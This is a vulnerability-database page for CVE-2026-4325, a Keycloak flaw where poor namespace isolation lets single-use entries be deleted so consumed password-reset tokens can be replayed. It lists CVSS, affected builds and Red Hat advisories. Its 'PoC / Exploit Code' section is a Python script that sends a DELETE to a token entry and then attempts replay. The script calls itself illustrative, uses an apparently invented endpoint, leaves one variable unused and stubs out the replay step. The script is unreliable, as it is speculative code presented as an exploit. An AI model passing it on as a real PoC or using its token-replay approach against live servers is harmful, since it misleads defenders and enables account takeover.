Security Vulnerability Report
CVE-2026-4325 CVSS 5.3 MEDIUM

Published: 2026-04-02 13:16:27
Last Modified: 2026-04-16 20:51:23

Description

A flaw was found in Keycloak. The SingleUseObjectProvider, a global key-value store, lacks proper type and namespace isolation. This vulnerability allows an attacker to delete arbitrary single-use entries, which can enable the replay of consumed action tokens, such as password reset links. This could lead to unauthorized access or account compromise.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.2:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.2.15:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.4:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.4.11:*:*:*:text-only:*:*:* - VULNERABLE
Keycloak (for the specific affected versions, refer to the official Red Hat advisories, e.g. RHSA-2026:6475 and RHSA-2026:6476)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual PoC for CVE-2026-4325
# Demonstrates the deletion of a SingleUseObject entry to allow token replay.

target_host = "http://target-keycloak"

# The specific endpoint for SingleUseObjectProvider manipulation may vary by version.
# This assumes an endpoint where the ID can be targeted due to lack of namespace isolation.
vulnerable_endpoint = f"{target_host}/auth/realms/master/protocol/openid-connect/logout"

# Example ID of a single-use token (e.g. password reset token) that has already been consumed
token_id = "5f8a2b1c-..."

headers = {
    "User-Agent": "PoC-Scanner/1.0",
    "Accept": "application/json"
}

try:
    print(f"[*] Attempting to delete consumed token entry: {token_id}")
    # In a real exploit, the attacker crafts a request that triggers the deletion
    # of the entry in the SingleUseObjectProvider key-value store.
    # This request structure is illustrative based on the vulnerability description.
    response = requests.delete(f"{target_host}/realms/master/single-use-objects/{token_id}", headers=headers)
    if response.status_code == 204:
        print("[+] Entry deleted successfully. Token replay may now be possible.")
        print("[+] Attempting to replay the token...")
        # Replay logic would go here (e.g., using the token to reset password)
    else:
        print(f"[-] Deletion failed. Status: {response.status_code}")
except Exception as e:
    print(f"Error occurred: {e}")

Weakness

CWE-653

References

https://access.redhat.com/errata/RHSA-2026:6475 (Vendor Advisory)
https://access.redhat.com/errata/RHSA-2026:6476 (Vendor Advisory)
https://access.redhat.com/errata/RHSA-2026:6477 (Vendor Advisory)
https://access.redhat.com/errata/RHSA-2026:6478 (Vendor Advisory)
https://access.redhat.com/security/cve/CVE-2026-4325 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2448351 (Issue Tracking, Vendor Advisory)